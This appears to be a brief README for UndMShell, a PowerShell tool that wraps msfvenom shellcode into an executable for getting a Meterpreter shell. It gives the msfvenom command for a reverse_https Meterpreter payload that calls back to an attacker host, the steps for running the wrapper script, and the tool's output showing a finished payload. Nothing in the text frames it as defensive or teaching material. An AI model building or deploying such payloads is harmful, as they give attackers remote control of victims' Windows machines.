UndMShell is a tool to generate a clean payload to get a Meterpreter shell.
Check the result below -7/10/2021-.
1. Run powersehll as Administrator
2. Install-Module ps2exe
PS C:\> # First, you need to generate a shellcode from Msfvenom and save it into txt file.
PS C:\> # msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f ps1
PS C:\> # Then run the script.
PS C:\> .\UndMShell.ps1 shellcode.txt UndMShell.exe
[-] UndMShell v0.1 | Coded by Abdullah AlZahrani | GitHub.com/0xAbdullah
- Your shellcode file: shellcode.txt
- Something is cooking, wait.
- Your payload is ready: UndMShell.exe